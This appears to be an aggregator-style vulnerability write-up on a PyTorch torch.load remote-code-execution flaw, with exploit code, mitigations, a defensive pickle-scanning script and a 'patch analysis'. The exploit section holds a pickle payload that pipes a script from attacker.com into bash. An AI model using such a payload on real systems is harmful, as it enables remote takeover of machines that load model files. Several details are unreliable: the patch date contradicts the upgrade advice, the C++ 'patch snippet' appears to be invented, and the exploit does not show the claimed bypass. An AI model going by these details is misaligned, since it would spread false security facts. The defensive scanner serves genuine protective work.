How CVE-2025-32434 Works
This vulnerability affects PyTorch versions ≤2.5.1 when loading serialized models via `torch.load()` with `weights_only=True`. Attackers can craft malicious pickle files containing arbitrary Python code, which executes during deserialization. Although `weights_only=True` is intended as a security measure, a flaw in its implementation allows unsafe object construction, leading to RCE. The exploit bypasses PyTorch's restricted unpickler by abusing Python's `__reduce__` method to trigger code execution in the context of the loading process.
DailyCVE Form
Platform: PyTorch
Version: ≤2.5.1
Vulnerability: RCE
Severity: Critical
Date: 05/28/2025
Prediction: Patch expected 06/10/2025
What Undercode Say:
Exploitation:
```python
import torch

# Malicious payload construction
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ("curl attacker.com/shell.sh | bash",))

payload = {"weights": Exploit()}
torch.save(payload, "exploit.pt")

# Trigger
torch.load("exploit.pt", weights_only=True)
```
Mitigation:
1. Immediate Upgrade:
pip install torch==2.6.0 --upgrade
2. Input Validation:
```python
import torch

def safe_load(model_path):
    # The extension check only filters obviously wrong inputs; it does not
    # inspect the pickle stream, so it is no substitute for the upgrade above.
    if not model_path.endswith(('.pt', '.pth')):
        raise ValueError("Invalid file format")
    return torch.load(model_path, weights_only=True)
```
3. Network Restrictions:
```shell
# Block untrusted model downloads
iptables -A OUTPUT -p tcp --dport 80 -j DROP
```
Detection:
```shell
# Scan for vulnerable versions (any installed torch ≤2.5.1 is affected);
# plain grep treats "|" literally, so match the package line and read the version
pip list | grep -Ei "^torch\s"
```
Log Analysis:
```python
import logging

logging.basicConfig(filename='torch_load.log', level=logging.WARNING)
```
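As an added example (not code from the original post or from the PyTorch project), a pre-load check for the mechanism described above: it decodes the pickle stream inside a `.pt` archive with `pickletools`, which never executes opcodes, and reports every module reference outside a constructed allowlist, so a file that imports `os` or any other non-tensor global through `__reduce__` is caught before `torch.load()` runs. The allowlist, the `extract_pickle`/`suspicious_globals`/`build_sample_archive` helpers and the sample archives are assumptions for this example, and it handles both the `GLOBAL` (protocol ≤3, which `torch.save` uses by default) and `STACK_GLOBAL` (protocol ≥4) encodings.

```python
import json
import pickle
import pickletools
import tempfile
import zipfile

# Constructed allowlist for this example (PyTorch's own weights_only list is
# per-symbol and stricter): any other module reference is reported before torch.load().
ALLOWED_TOP_LEVEL = {"torch", "collections", "numpy"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def extract_pickle(path):
    """Pickle stream of a zip-based torch.save() file (<name>/data.pkl), read without unpickling."""
    with zipfile.ZipFile(path) as zf:
        members = [n for n in zf.namelist() if n.rsplit("/", 1)[-1] == "data.pkl"]
        if not members:
            raise ValueError("archive has no data.pkl member")
        return zf.read(members[0])

def suspicious_globals(path):
    """(module, name) pairs imported by GLOBAL/STACK_GLOBAL outside the allowlist.
    STACK_GLOBAL operands are taken from the two latest string constants, which matches
    the standard pickler's output; memo-fetched operands would need a full stack emulator."""
    findings, strings = [], []
    for op, arg, _pos in pickletools.genops(extract_pickle(path)):
        if op.name in STRING_OPS:
            strings.append(arg)
            continue
        if op.name == "GLOBAL":           # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
        elif op.name == "STACK_GLOBAL":   # protocol >= 4: module and name pushed as strings
            module, name = strings[-2:]
        else:
            continue
        if module.split(".")[0] not in ALLOWED_TOP_LEVEL:
            findings.append((module, name))
    return findings

def build_sample_archive(obj, protocol=2):
    """Constructed torch-style zip (<name>/data.pkl) holding obj; returns its path."""
    with tempfile.NamedTemporaryFile(suffix=".pt", delete=False) as tmp:
        with zipfile.ZipFile(tmp, "w") as zf:
            zf.writestr("archive/data.pkl", pickle.dumps(obj, protocol=protocol))
        return tmp.name

def demo():
    """A plain state_dict is clean; a stray json.dumps reference (harmless stand-in for
    any non-tensor global) is flagged under both the GLOBAL and STACK_GLOBAL encodings."""
    clean = build_sample_archive({"weights": [1.0, 2.0], "bias": [0.5]})
    stray = [build_sample_archive({"fn": json.dumps}, protocol=p) for p in (2, 4)]
    return [suspicious_globals(p) for p in [clean] + stray]
```

Run `suspicious_globals()` on a downloaded checkpoint and refuse to load it when the list is non-empty; the legacy non-zip `torch.save` format is not handled here.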
Patch Analysis:
PyTorch 2.6.0 enforces strict deserialization checks:
```cpp
// Patch snippet (C++ backend)
#include <stdexcept>

void RestrictedUnpickler::find_class() {
    throw std::runtime_error("Unsafe opcode blocked");
}
```
References:
Reported By: nvd.nist.gov